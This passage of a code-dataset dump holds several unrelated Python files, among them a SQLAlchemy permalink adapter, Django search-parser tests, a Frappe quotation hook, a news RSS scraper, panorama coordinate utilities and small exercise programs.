option')","repo_name":"danielwiet/codecademy_python2_practice","sub_path":"AreaCalculator.py","file_name":"AreaCalculator.py","file_ext":"py","file_size_in_byte":776,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73860681512","text":"\"\"\"\nSQLAlchemy Database Adapter\n---------------------------\n\"\"\"\n\nfrom datetime import datetime\nimport random\nimport string\n\nfrom sqlalchemy import create_engine, Column, Integer, String, DateTime\nfrom sqlalchemy.ext.declarative import declarative_base\nfrom sqlalchemy.orm import sessionmaker\nfrom sqlalchemy.exc import IntegrityError\n\nimport db\n\n\nBase = declarative_base()\n\n\nclass ExecMessage(Base):\n \"\"\"\n Table of input messages in JSON form.\n \"\"\"\n __tablename__ = \"permalinks\"\n ident = Column(String, primary_key=True, index=True)\n code = Column(String)\n language = Column(String)\n interacts = Column(String)\n created = Column(DateTime, default=datetime.utcnow)\n last_accessed = Column(\n DateTime, default=datetime.utcnow, onupdate=datetime.utcnow)\n requested = Column(Integer, default=0)\n \n def __repr__(self):\n return \"\"\"\\\nident: {}\nCode:\n{}\nInteracts:\n{}\nLanguage: {}\nCreated: {}\nLast accessed: {}\nRequested: {}\"\"\".format(\n self.ident,\n self.code,\n self.interacts,\n self.language,\n self.created,\n self.last_accessed,\n self.requested)\n\n\nclass DB(db.DB):\n \"\"\"\n SQLAlchemy database adapter\n\n :arg db_file str: the SQLAlchemy URI for a database file\n \"\"\"\n\n def __init__(self, db_file):\n self.engine = create_engine(db_file)\n self.SQLSession = sessionmaker(bind=self.engine)\n Base.metadata.create_all(self.engine)\n self.dbsession = self.SQLSession()\n\n async def add(self, code, language, interacts):\n \"\"\"\n See :meth:`db.DB.add`\n \"\"\"\n while True:\n ident = \"\".join(\n random.choice(string.ascii_lowercase) for _ in range(6))\n message = ExecMessage(\n ident=ident,\n code=code,\n language=language,\n interacts=interacts)\n try:\n self.dbsession.add(message)\n self.dbsession.commit()\n except IntegrityError:\n # ident was used before\n self.dbsession.rollback()\n else:\n break\n return ident\n\n async def get(self, key):\n \"\"\"\n See :meth:`db.DB.get`\n \"\"\"\n msg = self.dbsession.query(ExecMessage).filter_by(ident=key).first()\n if msg is None:\n raise LookupError\n msg.requested = ExecMessage.requested + 1\n self.dbsession.commit()\n return (msg.code, msg.language, msg.interacts)\n","repo_name":"sagemath/sagecell","sub_path":"db_sqlalchemy.py","file_name":"db_sqlalchemy.py","file_ext":"py","file_size_in_byte":2546,"program_lang":"python","lang":"en","doc_type":"code","stars":184,"dataset":"github-code","pt":"72"} +{"seq_id":"11520373352","text":"class Asteroid(object):\r\n def __init__(self):\r\n self.pos = PVector(random(width), random(height))\r\n self.r = int(random(15, 50))\r\n self.edges_num = int(random(5, 15))\r\n \r\n \r\n def render(self):\r\n pushMatrix()\r\n stroke(255)\r\n\r\n translate(self.pos.x, self.pos.y)\r\n # ellipse(0, 0, self.r, self.r)\r\n beginShape()\r\n for i in range(self.edges_num):\r\n angle = map(i, 0, self.edges_num, 0, TWO_PI)\r\n x = self.r * cos(angle)\r\n y = self.r * sin(angle)\r\n vertex(x, y)\r\n endShape(CLOSE)\r\n \r\n \r\n popMatrix()\r\n","repo_name":"zhizdyuks/game1","sub_path":"game/asteroids.py","file_name":"asteroids.py","file_ext":"py","file_size_in_byte":651,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} 
+{"seq_id":"10997507393","text":"def main():\n felipe(\"Item: \")\n\n\ndef felipe(prompt):\n tacos = {\n \"Baja Taco\": 4.00,\n \"Burrito\": 7.50,\n \"Bowl\": 8.50,\n \"Nachos\": 11.00,\n \"Quesadilla\": 8.50,\n \"Super Burrito\": 8.50,\n \"Super Quesadilla\": 9.50,\n \"Taco\": 3.00,\n \"Tortilla Salad\": 8.00\n }\n\n total = 0\n while True: #\n try:\n item = input(prompt).title() # titlecased\n if item in tacos:\n total += tacos[item]\n print(f\"Total: ${total:.2f}\")\n except EOFError:\n print() #print(end=\"\\n\")\n break\n except KeyError:\n pass\n\n\nmain()\n","repo_name":"berkod-ai/python-basics","sub_path":"w3/pset3/taqueria/taqueria.py","file_name":"taqueria.py","file_ext":"py","file_size_in_byte":666,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"22819801927","text":"from __future__ import unicode_literals\nimport frappe\nfrom frappe.model.document import Document\n\nclass RequestforQuotation(Document):\n\tpass\n\ndef auto_create_opportunity(doc,method): \n\tfor row in doc.suppliers:\n\t\tfor val in doc.items:\n\t\t\ttag=get_tag(row.supplier)\n\t\t\tif val.qualifier==tag:\n\t\t\t\ttry:\n\t\t\t\t\tcustomer=frappe.db.get_value('Customer',{'is_internal_customer':1,'represents_company':doc.company},'customer_name')\n\t\t\t\t\tcompany=frappe.db.get_value('Supplier',{'is_internal_supplier':1,'supplier_name':row.supplier},'represents_company')\n\t\t\t\t\tcontact_person=frappe.db.get_value('Dynamic Link',{'parenttype':'Contact','link_doctype':'Customer','link_name':customer},'parent')\n\t\t\t\t\tcustomer_address=frappe.db.get_value('Dynamic Link',{'parenttype':'Address','link_doctype':'Customer','link_name':customer},'parent')\n\t\t\t\t\tr_name=frappe.db.get_list('Document Specific Naming Series',filters={'parent':company,'parenttype':'Company'},fields={'*'})\n\t\t\t\t\trfq_name=\"null\"\n\t\t\t\t\tfor tup in r_name:\n\t\t\t\t\t\tif tup.reference_document==\"Opportunity\":\n\t\t\t\t\t\t\trfq_name=tup.series\n\t\t\t\t\tif rfq_name!=\"null\":\n\t\t\t\t\t\tif customer:\n\t\t\t\t\t\t\tif company:\n\t\t\t\t\t\t\t\tcreate_user_permission(row.email_id,'Company',company,True)\n\t\t\t\t\t\t\t\topp_doc=frappe.get_doc(dict(doctype = 'Opportunity',\n\t\t\t\t\t\t\t\t\t\t\topportunity_from = 'Customer',\n\t\t\t\t\t\t\t\t\t\t\tnaming_series=rfq_name,\n\t\t\t\t\t\t\t\t\t\t\tparty_name=customer,\n\t\t\t\t\t\t\t\t\t\t\tcontact_person=contact_person,\n\t\t\t\t\t\t\t\t\t\t\twith_items=1,\n\t\t\t\t\t\t\t\t\t\t\tcustomer_address=customer_address,\n\t\t\t\t\t\t\t\t\t\t\tcontact_display=contact_person,\n\t\t\t\t\t\t\t\t\t\t\tcontact_email=frappe.db.get_value('Contact Email', {'parenttype':'Contact','parent':contact_person},'email_id'),\n\t\t\t\t\t\t\t\t\t\t\tcompany=company,\n\t\t\t\t\t\t\t\t\t\t\treference_no=doc.name,\n\t\t\t\t\t\t\t\t\t\t\tquotation_type=doc.quotation_type,\n\t\t\t\t\t\t\t\t\t\t\topening_date=doc.opening_date,\n\t\t\t\t\t\t\t\t\t\t\tignore_permissions='true')).insert()\t\t\t\n\t\t\t\t\t\t\t\topp_doc.append('items', {\n\t\t\t\t\t\t\t\t\t'item_code': val.item_code,\n\t\t\t\t\t\t\t\t\t'qty': val.qty,\n\t\t\t\t\t\t\t\t\t'uom':val.uom\n\t\t\t\t\t\t\t\t\t})\n\t\t\t\t\t\t\t\tagent_name=frappe.db.get_value('User',{'email':frappe.session.user},'full_name')\n\t\t\t\t\t\t\t\tagent_company=frappe.db.get_value('User',{'email':frappe.session.user},'represents_company')\n\t\t\t\t\t\t\t\tif agent_company:\n\t\t\t\t\t\t\t\t\topp_doc.add_comment('Comment',agent_name+' created '+opp_doc.name+' from 
'+agent_company)\n\t\t\t\t\t\t\t\topp_doc.save()\n\t\t\t\t\t\t\t\tdoc.add_comment('Created',' created Opportunity for '+row.supplier)\n\t\t\t\t\t\t\t\tcompanyName=frappe.db.get_value('Item',val.item_code,'company_name')\n\t\t\t\t\t\t\t\tif companyName:\n\t\t\t\t\t\t\t\t\tcreate_user_permission(row.email_id,'Company',companyName,False,'Item')\n\t\t\t\t\t\t\t\t\t\n\t\t\t\t\t\telse:\n\t\t\t\t\t\t\tfrappe.msgprint(\"Unable to create Opportunity as customer: \"+doc.company+ \" is not associated with any company. Register the Company and submit the document: \"+doc.name+\". As Customer is not associated with any company, don't let MA submit the RFQ document.\")\n\t\t\t\t\t\t\traise frappe.ValidationError(\"Unable to create Opportunity as customer: \" +doc.company+\" is not associated with any company.\")\n\t\t\t\t\telse:\n\t\t\t\t\t\tfrappe.throw(\"Unable to save the Opportunity as the naming series are unavailable. Please provide the naming series at the Company: \"+company+\" to save the document\")\n\t\t\t\texcept KeyError:\n\t\t\t\t\tpass\n@frappe.whitelist()\ndef create_user_permission(user,allow,value,check,applicable_for=''):\n#user,allow,for_value,apply_to_all_doctypes,applicable_for\n docVal=frappe.db.get_list('User Permission', filters={'user':user,'for_value':value,'allow':allow,'apply_to_all_doctypes':check,'applicable_for':applicable_for})\n if not docVal:\n frappe.get_doc(dict(doctype = 'User Permission',\n \tuser = user,\n allow=allow,\n \tfor_value =value,\n \tapply_to_all_doctypes=check,\n \tapplicable_for=applicable_for)).insert()\n\n\n@frappe.whitelist()\ndef delete_user_permission(user,allow,value,check,applicable_for=''):\n#user,allow,for_value,apply_to_all_doctypes,applicable_for\n docVal=frappe.db.get_list('User Permission', filters={'user':user,'for_value':value,'allow':allow,'apply_to_all_doctypes':check,'applicable_for':applicable_for})\n # delete the matching permission when one exists (the original tested the empty case and then created and deleted a brand-new document, which never removed anything)\n if docVal:\n frappe.delete_doc('User Permission', docVal[0].name)\n\n\n@frappe.whitelist()\ndef get_tag(parent):\n\treturn frappe.db.get_value('Tag Link',{'parent':parent},'tag')\n","repo_name":"Sagarikanaik96/seabridge_test","sub_path":"seabridge_app/seabridge_app/doctype/request_for_quotation/request_for_quotation.py","file_name":"request_for_quotation.py","file_ext":"py","file_size_in_byte":4440,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"42203624507","text":"\"\"\"\n https://leetcode-cn.com/problems/n-ary-tree-level-order-traversal/\n https://leetcode-cn.com/problems/n-ary-tree-level-order-traversal/solution/ncha-shu-de-ceng-xu-bian-li-python3yan-du-you-xian/\n \n\"\"\"\n\n\"\"\"\n# Definition for a Node.\nclass Node:\n def __init__(self, val=None, children=None):\n self.val = val\n self.children = children\n\"\"\"\n\nclass Solution:\n def levelOrder(self, root: 'Node') -> List[List[int]]:\n if not root: return []\n queue = [root]\n res = []\n while queue:\n # output the values of the current level's nodes from left to right (wrapped in a list; the original appended a bare generator)\n res.append([node.val for node in queue])\n # rebuild the queue: walk the current level's nodes from left to right and collect each node's children in order\n queue = [child for node in queue for child in node.children]\n return res","repo_name":"zhouyang412/myleetcode","sub_path":"二叉树/429. N 叉树的层序遍历.py","file_name":"429. 
N 叉树的层序遍历.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"33924912603","text":"import sqlite3\nimport time\n\ndef currentTime():\n return time.strftime('%m-%d-%Y_%H%M', time.localtime())\n\n\nprint(\"[{0}] Starting Daily Reset\".format(currentTime()))\ndb_file = r'./mornatk.db'\nconnection = None\ntry:\n print(\"[{0}] Connecting to Database\".format(currentTime()))\n connection = sqlite3.connect(db_file)\nexcept Exception as e:\n print(\"[{0}] Error Connecting to Database\".format(currentTime()))\n print(e)\n\nif connection is not None:\n print(\"[{0}] Resetting DailyXP\".format(currentTime()))\n sql = ''' UPDATE players SET daily = 0'''\n cur = connection.cursor()\n cur.execute(sql)\n connection.commit()\n connection.close\n\n\nprint(\"[{0}] Daily Reset Complete\".format(currentTime()))\n","repo_name":"AntPerez69367/morna-addict","sub_path":"data/dailyReset.py","file_name":"dailyReset.py","file_ext":"py","file_size_in_byte":717,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"73353031274","text":"import asyncio\nimport logging\n\nfrom nfcclient.gpio_client import gpio_client\n\n\nclass Door:\n name: str\n pin_id: int\n _opened: bool = False\n _closing_task: any\n\n def __init__(self, name, pin):\n self.name = name\n self.pin_id = pin\n self._closing_task = None\n gpio_client.configure(self.pin_id)\n\n def is_open(self):\n return self._opened\n\n async def open(self, seconds: int, remote: bool = False) -> None:\n # 0 seconds has special meaning which is to shutdown the doors\n if seconds == 0:\n self._cancel_closing_doors()\n self._close()\n return\n\n if self.is_open():\n if remote:\n # if doors are open for remotely opening just cancel scheduled action and set up new\n # otherwise act normally\n self._cancel_closing_doors()\n self._closing_task = asyncio.get_event_loop().call_later(seconds, self._close)\n return\n\n self._open()\n\n self._closing_task = asyncio.get_event_loop().call_later(seconds, self._close)\n\n def _cancel_closing_doors(self):\n if self._closing_task:\n self._closing_task.cancel()\n self._closing_task = None\n\n def _open(self):\n self._opened = True\n logging.info(f\"Door {self.name} OPEN\")\n gpio_client.open(pin=self.pin_id)\n\n def _close(self):\n self._opened = False\n logging.info(f\"Door {self.name} Closed\")\n gpio_client.close(pin=self.pin_id)\n\n def clean(self):\n gpio_client.clean(self.pin_id)\n","repo_name":"devopsbay/raspberry-client","sub_path":"nfcclient/doors/model.py","file_name":"model.py","file_ext":"py","file_size_in_byte":1592,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"13688973525","text":"# -*- coding: utf-8 -*-\n\nfrom django.db.models import Q\nfrom django.core.exceptions import ValidationError\n\n\nfrom dynamiq.utils import ParsedStringQBuilder\nfrom dynamiq.tests.forms.haystack import BoatSearchForm\nfrom dynamiq.tests.base import BaseStringParsedQBuilderTests\n\n\nclass StringParsedQBuilderTests(BaseStringParsedQBuilderTests):\n\n form = BoatSearchForm\n\n def test_split_query_string_must_split_on_spaces_unless_in_quotes(self):\n s = \"\"\"daniel AND country!=FR OR -\"Le PEN Marine\" country:FR is_active:1 group=NI\"\"\"\n output = ParsedStringQBuilder.split_query_string(s)\n expected_output = [\n \"daniel\",\n \"AND\",\n \"country!=FR\",\n \"OR\",\n '-\"Le PEN Marine\"',\n \"country:FR\",\n 
\"is_active:1\",\n \"group=NI\"\n ]\n self.assertEqual(expected_output, output)\n\n def test_split_query_element(self):\n def do(input, output):\n self.assertEqual(\n ParsedStringQBuilder.split_query_element(input),\n output,\n )\n do(\"daniel\", ['daniel'])\n do(\"AND\", ['AND'])\n do(\"country!=FR\", ['country', '!=', 'FR'])\n do(\"OR\", ['OR'])\n do(\"-Le PEN Marine\", ['-Le PEN Marine'])\n do('-\"Le PEN Marine\"', ['-\"Le PEN Marine\"'])\n do(\"country:FR\", ['country', ':', 'FR'])\n do(\"group:Greens/EFA\", ['group', ':', 'Greens/EFA'])\n\n def test_default_filter_is_used_if_not_given(self):\n q = \"Spray\"\n expected = Q(fulltext__contains=\"Spray\")\n self.run_test(q, expected)\n\n def test_simple_search_is_ANDed(self):\n q = \"Pen Duick\"\n expected = Q(fulltext__contains=\"Pen\") & Q(fulltext__contains=\"Duick\")\n self.run_test(q, expected)\n\n def test_search_with_AND_is_ANDed(self):\n q = \"Joshua AND Moitessier\"\n expected = Q(fulltext__contains=\"Joshua\") & Q(fulltext__contains=\"Moitessier\")\n self.run_test(q, expected)\n\n def test_search_with_OR_is_ORed(self):\n q = \"Joshua OR Moitessier\"\n expected = Q(fulltext__contains=\"Joshua\") | Q(fulltext__contains=\"Moitessier\")\n self.run_test(q, expected)\n\n def test_OR_and_AND_can_be_mixed(self):\n q = \"Pen Duick OR Commodore Explorer\"\n Q1 = Q(fulltext__contains=\"Pen\") & Q(fulltext__contains=\"Duick\")\n Q2 = Q(fulltext__contains=\"Commodore\") & Q(fulltext__contains=\"Explorer\")\n expected = Q1 | Q2\n self.run_test(q, expected)\n\n def test_search_field_can_be_defined(self):\n q = \"captain:Tabarly\"\n expected = Q(captain__contains=\"Tabarly\")\n self.run_test(q, expected)\n\n def test_operator_equal_can_be_used(self):\n q = \"captain=Tabarly\"\n expected = Q(captain__contains=\"Tabarly\")\n self.run_test(q, expected)\n\n def test_lookup_can_be_negated_on_operator(self):\n q = \"captain!=Tabarly\"\n expected = ~Q(captain__contains=\"Tabarly\")\n self.run_test(q, expected)\n q = \"captain!:Tabarly\"\n expected = ~Q(captain__contains=\"Tabarly\")\n self.run_test(q, expected)\n\n def test_lookup_can_be_negated_on_value(self):\n q = \"-Tabarly\"\n expected = ~Q(fulltext__contains=\"Tabarly\")\n self.run_test(q, expected)\n\n def test_quoted_terms_are_not_splited(self):\n q = '\"Eric Tabarly\"'\n expected = Q(fulltext__contains=\"Eric Tabarly\")\n self.run_test(q, expected)\n\n def test_quoted_terms_can_be_negated(self):\n q = '-\"Eric Tabarly\"'\n expected = ~Q(fulltext__contains=\"Eric Tabarly\")\n self.run_test(q, expected)\n\n def test_gte_can_be_used(self):\n q = 'year>=1966'\n expected = Q(year__gte=\"1966\")\n self.run_test(q, expected)\n\n def test_lte_can_be_used(self):\n q = 'year<=1966'\n expected = Q(year__lte=\"1966\")\n self.run_test(q, expected)\n\n def test_gte_and_lte_can_be_mixed(self):\n q = 'year>=1966 year<=1978'\n expected = Q(year__gte=\"1966\") & Q(year__lte=\"1978\")\n self.run_test(q, expected)\n\n def test_gt_can_be_used(self):\n q = 'hull>1'\n expected = Q(hull__gt=\"1\")\n self.run_test(q, expected)\n\n def test_lt_can_be_used(self):\n q = 'mast<3'\n expected = Q(mast__lt=\"3\")\n self.run_test(q, expected)\n\n def test_complex_search(self):\n q = \"\"\"captain:Tabarly year>=1966 mast=1 OR captain!=Cammas year<=1999 OR captain=\"Bernard Moitessier\" Joshua\"\"\"\n Q1 = Q(captain__contains=\"Tabarly\") & Q(year__gte=\"1966\") & Q(mast=\"1\")\n Q2 = ~Q(captain__contains=\"Cammas\") & Q(year__lte=\"1999\")\n Q3 = Q(captain__contains=\"Bernard Moitessier\") & Q(fulltext__contains=\"Joshua\")\n 
expected = Q1 | Q2 | Q3\n self.run_test(q, expected)\n\n def test_do_not_raise_on_error_by_default(self):\n q = 'year>=1966 month=3' # month is invalid, it will be ignored\n expected = Q(year__gte=\"1966\")\n self.run_test(q, expected)\n\n def test_raise_on_error(self):\n q = 'year>=1966 month=3' # month is invalid\n F = ParsedStringQBuilder(q, BoatSearchForm, raise_on_error=True)\n with self.assertRaises(ValidationError):\n query, label = F()\n","repo_name":"liberation/django-dynamiq-search-form","sub_path":"dynamiq/tests/utils/qbuilder/parsedstring.py","file_name":"parsedstring.py","file_ext":"py","file_size_in_byte":5212,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"72"} +{"seq_id":"19753610624","text":"import feedparser\r\nfrom dateutil import parser\r\nimport requests\r\nfrom bs4 import BeautifulSoup\r\nimport datetime\r\nfrom urllib.parse import urlparse\r\nfrom datetime import date, timedelta\r\n\r\nyesterday = date.today() - timedelta(days=1)\r\nformattedY = yesterday.strftime(\"%B %d, %Y\")\r\ntoday = datetime.date.today()\r\nformattedT = today.strftime(\"%B %d, %Y\")\r\n\r\nrss_urls = [\r\n \"https://www.news.com.au/content-feeds/latest-news-national/\",\r\n \"https://www.news.com.au/content-feeds/latest-news-world/\",\r\n \"https://www.7news.com.au/rss/\",\r\n \"https://9news.com.au/just-in/rss\"]\r\n\r\noutputs = []\r\nfor rss_url in rss_urls:\r\n feed = feedparser.parse(rss_url)\r\n\r\n for entry in feed.entries:\r\n\r\n if \"published\" in entry: # 9news&7news\r\n published_date = parser.parse(entry.published)\r\n date_text = published_date.strftime( \"%B %d, %Y\")\r\n response = requests.get(entry.link)\r\n\r\n # Create a BeautifulSoup object from the response content\r\n soup = BeautifulSoup(response.content, 'html.parser')\r\n\r\n else: #news.com.au\r\n response = requests.get(entry.link)\r\n soup = BeautifulSoup(response.content, 'html.parser')\r\n articles = soup.find_all('article')\r\n\r\n for article in articles:\r\n link_element = article.find('a', class_='storyblock_title_link')\r\n if link_element:\r\n link = link_element['href']\r\n else:\r\n link = \" \"\r\n news_date = soup.find('div', class_='byline_publish')\r\n date_text = news_date.text.strip().split(' - ')[0]\r\n\r\n if formattedT == date_text:\r\n title = entry.title\r\n link = entry.link\r\n\r\n\r\n if link.startswith(\"https://www.news.com.au/\"):\r\n soup = BeautifulSoup(response.content, 'html.parser')\r\n article = soup.find_all('article', id='story')\r\n article_content = soup.find('div', id='story-primary')\r\n content_text = article_content.text.strip()\r\n\r\n elif link.startswith(\"https://www.9news.com.au/\"):\r\n article_contents = soup.find_all('div', class_='block-content')\r\n content_text = \"\"\r\n for content_div in article_contents:\r\n content_spans = content_div.find_all('span')\r\n for span in content_spans:\r\n content_text += span.text.strip() + \" \"\r\n else:\r\n article_contents = soup.find_all('article')\r\n content_text = \"\"\r\n for content_div in article_contents:\r\n content_paras = content_div.find_all('p')\r\n for p in content_paras:\r\n content_text += p.text.strip() + \" \"\r\n\r\n print(link)\r\n","repo_name":"QueenieX/ICT_web-news","sub_path":"getDaily.py","file_name":"getDaily.py","file_ext":"py","file_size_in_byte":2864,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"72277119592","text":"import numpy as np\n\n\"\"\"\n In this file, the coordinate system is 
defined as below:\n Image coordinate system:\n \n --------------> x\n | ***\n | ***\n | ****\n y\n #####################################\n \n Sphere coordinate system:\n vertical angle (elevation): phi, the angle between the vector and the x-z plane\n Image coordinate y range: 0 ~ height\n Sphere coordinate phi range: -0.5*pi ~ 0.5*pi\n \n horizontal angle (azimuth): theta, the angle between the vector and the z axis\n Image coordinate x range: 0 ~ width\n Sphere coordinate theta range: -pi ~ pi\n \n #####################################\n World coordinate system:\n z\n /\n /\n /\n --------------> x\n |\n |\n |\n y\n\n\"\"\"\n\n\ndef image_2_world_coordinate(img_x, img_y, width, height):\n \"\"\"\n Given the image coordinate (img_x, img_y) and the size of the EnvMap, compute its world coordinates.\n Return a normalized vector as a numpy array of size (3,), representing (world_x, world_y, world_z)\n \"\"\"\n theta = img_x * 2 * np.pi / width - np.pi\n phi = (img_y + 0.5) * np.pi / height - np.pi / 2\n return np.array([np.cos(phi) * np.sin(theta), np.sin(phi), np.cos(phi) * np.cos(theta)])\n\n\ndef angle_2_image_coordinate(theta_phi, width, height):\n theta = theta_phi[:, 0]\n phi = theta_phi[:, 1]\n\n x = (theta + np.pi) * width / 2 / np.pi\n y = (phi + np.pi / 2) * height / np.pi - 0.5\n i_x = np.round(x).astype(int) % width\n i_y = np.round(y).astype(int) % height\n return np.column_stack((i_x, i_y))\n\n\ndef world_2_angle_coordinate(world_p):\n \"\"\"\n Input world_coordinate : (num , 3) like: ([x,y,z], [x,y,z], ...)\n Output angle_coordinate : (num , 2) like: ([theta, phi], [theta, phi], ...)\n \"\"\"\n target_p_x, target_p_y, target_p_z = world_p[:, 0], world_p[:, 1], world_p[:, 2]\n\n r = np.sqrt(np.sum(world_p ** 2, -1))\n\n phi = np.arcsin(target_p_y / r)\n theta = np.arcsin(target_p_x / np.sqrt(target_p_x ** 2 + target_p_z ** 2+1e-10))\n\n idx = np.where((target_p_x < 0) & (target_p_z < 0))\n theta[idx] = - theta[idx] - np.pi\n\n idx = np.where((target_p_x > 0) & (target_p_z < 0))\n theta[idx] = - theta[idx] + np.pi\n\n # if target_p_x > 0 and target_p_z > 0:\n # theta = theta\n # elif target_p_x < 0 and target_p_z < 0:\n # theta = - theta - np.pi\n # elif target_p_x < 0 and target_p_z > 0:\n # theta = theta\n # elif target_p_x > 0 and target_p_z < 0:\n # theta = - theta + np.pi\n return np.column_stack((theta, phi))\n\n\ndef auto_render_coor_to_image_coor(xyz, width=1024, height=512):\n world_p = xyz.copy()\n world_p[:, 2] = xyz[:, 0]\n world_p[:, 1] = -xyz[:, 2]\n world_p[:, 0] = -xyz[:, 1]\n theta_phi = world_2_angle_coordinate(world_p)\n ix_iy = angle_2_image_coordinate(theta_phi, width, height)\n return ix_iy\n\n\ndef normalize(x):\n if len(np.shape(x)) == 1:\n return x / (np.linalg.norm(x) + 1e-12)\n else:\n return x / np.linalg.norm(x, axis=1)[:, np.newaxis]\n\n\ndef normalize_axis(x, axis=None):\n if len(np.shape(x)) == 1:\n return x/(np.linalg.norm(x))\n else:\n return x/np.expand_dims(np.linalg.norm(x, axis=axis), axis=axis)\n\n\ndef calc_foot_point_on_plane(n, v, h=0):\n \"\"\"\n\n :param np.ndarray n: normal vector of plane\n :param np.ndarray v:\n :param float h: plane height\n :return:\n :rtype: np.ndarray\n \"\"\"\n n = np.array(n).flatten() / np.linalg.norm(n)\n v = np.array(v).flatten() / np.linalg.norm(v)\n p = v - (np.dot(n, v) - h) * n\n return normalize(p)\n\n\n# Rotate vector around arbitrary axis\ndef rotateVector(vector, axis, angle):\n cos_ang = np.reshape(np.cos(angle), (-1))\n sin_ang = np.reshape(np.sin(angle), (-1))\n vector = np.reshape(vector, (-1, 
3))\n    axis = np.reshape(np.array(axis), (-1, 3))\n    out = vector * cos_ang[:, np.newaxis] + \\\n          axis * np.dot(vector, np.transpose(axis)) * (1 - cos_ang)[:, np.newaxis] + \\\n          np.cross(axis, vector) * sin_ang[:, np.newaxis]\n\n    return np.reshape(out, (-1))\n\n\ndef vec_2_halfangle(light, view, normal):\n    view = np.array(view).reshape(-1)\n    normal = np.array(normal).reshape(-1)\n    light = np.array(light).reshape(-1)\n    H = normalize((view + light) / 2)\n\n    theta_h = np.arccos(np.dot(normal, H) / (np.linalg.norm(normal) * np.linalg.norm(H) + 1e-12))\n\n    foot_light = calc_foot_point_on_plane(normal, light)\n    foot_H = calc_foot_point_on_plane(normal, H)\n    t = foot_light\n    binormal = normalize(np.cross(normal, t))\n\n    phi_h = np.arccos(np.dot(t, foot_H) / (np.linalg.norm(t) * np.linalg.norm(foot_H) + 1e-12))\n\n    tmp = rotateVector(light, normal, -phi_h)\n    diff = rotateVector(tmp, binormal, -theta_h)\n    foot_diff = calc_foot_point_on_plane(normal, diff)\n    theta_d = np.arccos(np.dot(normal, diff) / (np.linalg.norm(normal) * np.linalg.norm(diff) + 1e-12))\n\n    phi_d = np.arccos(np.dot(t, foot_diff) / (np.linalg.norm(t) * np.linalg.norm(foot_diff) + 1e-12))\n\n    return theta_h, theta_d, phi_d\n\n\ndef SurfaceArea_of_EnvMap(height, width):\n    \"\"\"\n    Given a size of the env_map, compute the corresponding surface area of each point on a sphere.\n    Return a numpy array with size (height, width), such that np.sum(surface_area)=1.\n    Surface area of a sphere formula: S = 2 * pi * R * h, where R is the radius of the sphere and h is the height of the 'ring'\n    \"\"\"\n    surface_area = np.empty(shape=(height, width))\n    for i in range(height):\n        phi_up = np.pi * i / height\n        phi_down = np.pi * (i + 1) / height\n        h = np.cos(phi_up) - np.cos(phi_down)\n        ds = h / width\n        surface_area[i, :] = ds\n    surface_area = surface_area / np.sum(surface_area)\n    return surface_area\n\n\ndef LightDirection_of_EnvMap(height, width):\n    \"\"\"\n    Given a size of the env_map, compute the corresponding light direction as a vector at each point on a sphere.\n    The vector map is computed like an 'outgoing' vector map.\n    Return a numpy array with size (height, width, 3). 
And each point as an normalized vector.\n \"\"\"\n light_vector_map = np.empty(shape=(height, width, 3))\n for img_x in range(width):\n for img_y in range(height):\n light_vector_map[img_y, img_x, :] = image_2_world_coordinate(img_x=img_x, img_y=img_y, width=width, height=height)\n return light_vector_map\n","repo_name":"junxuan-li/LRG_360Panoramic","sub_path":"Lighting_Estimation/utils.py","file_name":"utils.py","file_ext":"py","file_size_in_byte":6403,"program_lang":"python","lang":"en","doc_type":"code","stars":24,"dataset":"github-code","pt":"72"} +{"seq_id":"11343691463","text":"from PyQt5 import QtWidgets\nfrom PyQt5.QtWidgets import QApplication, QMainWindow\n\nimport sys\n\n\nclass Window(QMainWindow):\n def __init__(self, app):\n super(Window, self).__init__()\n\n self.screen = app.primaryScreen()\n self.size = self.screen.size()\n self.clicked = 0\n self.window_title = \"AdaptiveClicker\"\n\n self.screen_width = self.size.width()\n self.screen_height = self.size.height()\n\n self.window_width = 800\n self.window_height = 300\n\n self.window_start_pos_x = self.screen_width // 2 - self.window_width // 2\n self.window_start_pos_y = self.screen_height // 2 - self.window_height // 2\n\n self.setWindowTitle(self.window_title)\n self.setGeometry(self.window_start_pos_x, self.window_start_pos_y, self.window_width, self.window_height)\n\n self.main_text = MainText(self)\n self.button = Button(self)\n\n def resizeEvent(self, event):\n self.window_width = self.geometry().width()\n self.window_height = self.geometry().height()\n\n self.main_text.update_pos()\n self.button.update_pos()\n\n\nclass MainText:\n def __init__(self, window):\n self.window = window\n self.main_text = QtWidgets.QLabel(self.window)\n self.main_text.setText(f\"Clicks: {self.window.clicked}\")\n self.main_text.adjustSize()\n self.main_text_size = self.main_text.size()\n self.main_text_width = self.main_text_size.width()\n self.main_text_height = self.main_text_size.height()\n self.main_text_pos_x = (self.window.window_width - self.main_text_width) // 2\n self.main_text_pos_y = (self.window.window_height - self.main_text_height) // 2\n self.main_text.move(self.main_text_pos_x, self.main_text_pos_y)\n\n def update_text(self):\n self.main_text.setText(f\"Clicks: {self.window.clicked}\")\n self.main_text.adjustSize()\n\n def update_pos(self):\n self.main_text_pos_x = (self.window.window_width - self.main_text_width) // 2\n self.main_text_pos_y = (self.window.window_height - self.main_text_height) // 2\n self.main_text.move(self.main_text_pos_x, self.main_text_pos_y)\n\n\nclass Button:\n def __init__(self, window):\n self.window = window\n self.btn = QtWidgets.QPushButton(self.window)\n self.text = \"CLICK ME\"\n self.btn.setText(self.text)\n self.btn.setFixedSize(150, 50)\n self.btn_size = self.btn.size()\n self.btn_width = self.btn_size.width()\n self.btn_height = self.btn_size.height()\n self.btn_pos_x = (self.window.window_width - self.btn_width) // 2\n self.btn_pos_y = self.window.main_text.main_text_pos_y + self.window.main_text.main_text_height + 10\n\n self.btn.move(self.btn_pos_x, self.btn_pos_y)\n self.btn.clicked.connect((self.on_click))\n\n def 